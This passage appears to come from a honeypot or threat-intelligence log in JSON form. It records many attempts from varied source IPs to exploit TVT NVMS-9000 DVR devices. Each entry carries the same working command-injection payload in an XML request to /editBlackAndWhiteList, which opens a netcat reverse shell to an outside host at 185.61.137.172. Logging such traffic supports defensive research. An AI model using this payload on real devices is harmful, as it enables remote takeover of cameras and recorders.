- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 28,
- "first_seen": "2019-12-23T14:18:31Z",
- "last_seen": "2019-12-23T14:18:31Z"
- },
- {
- "source_ip_address": "89.137.126.112",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 29,
- "first_seen": "2019-12-23T13:57:01Z",
- "last_seen": "2019-12-23T13:57:01Z"
- },
- {
- "source_ip_address": "186.193.19.48",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 30,
- "first_seen": "2019-12-23T13:43:38Z",
- "last_seen": "2019-12-23T13:43:38Z"
- },
- {
- "source_ip_address": "82.78.233.250",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T13:37:21Z",
- "last_seen": "2019-12-23T13:37:21Z"
- },
- {
- "source_ip_address": "187.163.188.243",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T13:32:49Z",
- "last_seen": "2019-12-23T13:32:49Z"
- },
- {
- "source_ip_address": "189.213.220.124",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-12-22T09:22:42Z",
- "last_seen": "2019-12-23T12:38:52Z"
- },
- {
- "source_ip_address": "189.129.19.37",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T12:36:58Z",
- "last_seen": "2019-12-23T12:36:58Z"
- },
- {
- "source_ip_address": "220.134.249.207",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 8,
- "first_seen": "2019-12-23T12:27:09Z",
- "last_seen": "2019-12-23T12:27:09Z"
- },
- {
- "source_ip_address": "189.139.92.76",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T12:08:01Z",
- "last_seen": "2019-12-23T12:08:01Z"
- },
- {
- "source_ip_address": "47.148.171.10",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T11:53:48Z",
- "last_seen": "2019-12-23T11:53:48Z"
- },
- {
- "source_ip_address": "106.1.111.165",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T11:46:03Z",
- "last_seen": "2019-12-23T11:46:03Z"
- },
- {
- "source_ip_address": "104.33.81.6",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T11:34:27Z",
- "last_seen": "2019-12-23T11:34:27Z"
- },
- {
- "source_ip_address": "221.157.48.175",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 3,
- "first_seen": "2019-12-23T11:09:11Z",
- "last_seen": "2019-12-23T11:09:11Z"
- },
- {
- "source_ip_address": "181.220.185.164",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 28,
- "first_seen": "2019-12-23T10:52:44Z",
- "last_seen": "2019-12-23T10:52:44Z"
- },
- {
- "source_ip_address": "95.123.27.193",
- "country": "ES",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 38,
- "first_seen": "2019-12-23T10:47:26Z",
- "last_seen": "2019-12-23T10:47:26Z"
- },
- {
- "source_ip_address": "70.24.162.14",
- "country": "CA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 81,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T09:11:38Z",
- "last_seen": "2019-12-23T09:11:38Z"
- },
- {
- "source_ip_address": "68.129.235.16",
- "country": "US",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T09:08:18Z",
- "last_seen": "2019-12-23T09:08:18Z"
- },
- {
- "source_ip_address": "93.55.176.37",
- "country": "IT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T08:53:52Z",
- "last_seen": "2019-12-23T08:53:52Z"
- },
- {
- "source_ip_address": "45.225.140.239",
- "country": "BR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T08:29:10Z",
- "last_seen": "2019-12-23T08:29:10Z"
- },
- {
- "source_ip_address": "81.196.131.15",
- "country": "RO",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T08:27:47Z",
- "last_seen": "2019-12-23T08:27:47Z"
- },
- {
- "source_ip_address": "176.120.32.32",
- "country": "UA",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 38,
- "first_seen": "2019-12-23T08:26:45Z",
- "last_seen": "2019-12-23T08:26:45Z"
- },
- {
- "source_ip_address": "118.46.214.184",
- "country": "KR",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 6,
- "first_seen": "2019-12-23T08:25:28Z",
- "last_seen": "2019-12-23T08:25:28Z"
- },
- {
- "source_ip_address": "114.32.249.185",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8080,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 12,
- "first_seen": "2019-12-23T08:03:16Z",
- "last_seen": "2019-12-23T08:03:16Z"
- },
- {
- "source_ip_address": "203.106.200.190",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 88,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T08:02:35Z",
- "last_seen": "2019-12-23T08:02:35Z"
- },
- {
- "source_ip_address": "187.202.60.143",
- "country": "MX",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 2,
- "first_seen": "2019-12-23T08:02:09Z",
- "last_seen": "2019-12-23T08:02:09Z"
- },
- {
- "source_ip_address": "59.125.188.199",
- "country": "TW",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 8000,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 1,
- "first_seen": "2019-12-23T07:48:38Z",
- "last_seen": "2019-12-23T07:48:38Z"
- },
- {
- "source_ip_address": "186.96.211.134",
- "country": "TT",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
- "post_data": "\"<?xml version=\\x221.0\\x22 encoding=\\x22utf-8\\x22?><request version=\\x221.0\\x22 systemType=\\x22NVMS-9000\\x22 clientType=\\x22WEB\\x22><types><filterTypeMode><enum>refuse</enum><enum>allow</enum></filterTypeMode><addressType><enum>ip</enum><enum>iprange</enum><enum>mac</enum></addressType></types><content><switch>true</switch><filterType type=\\x22filterTypeMode\\x22>refuse</filterType><filterList type=\\x22list\\x22><itemType><addressType type=\\x22addressType\\x22/></itemType><item><switch>true</switch><addressType>ip</addressType><ip>$(nc${IFS}185.61.137.172${IFS}31330${IFS}-e${IFS}$SHELL&)</ip></item></filterList></content></request>\"",
- "target_port": 80,
- "protocol": "tcp",
- "tags": [
- {
- "cve": "",
- "category": "IoT",
- "description": "TVT (Generic OEM) DVR RCE"
- }
- ],
- "event_count": 12,
- "first_seen": "2019-12-23T07:36:46Z",
- "last_seen": "2019-12-23T07:36:46Z"
- },
- {
- "source_ip_address": "103.253.105.37",
- "country": "MY",
- "user_agent": "Help",
- "payload": "POST /editBlackAndWhiteList HTTP/1.1",
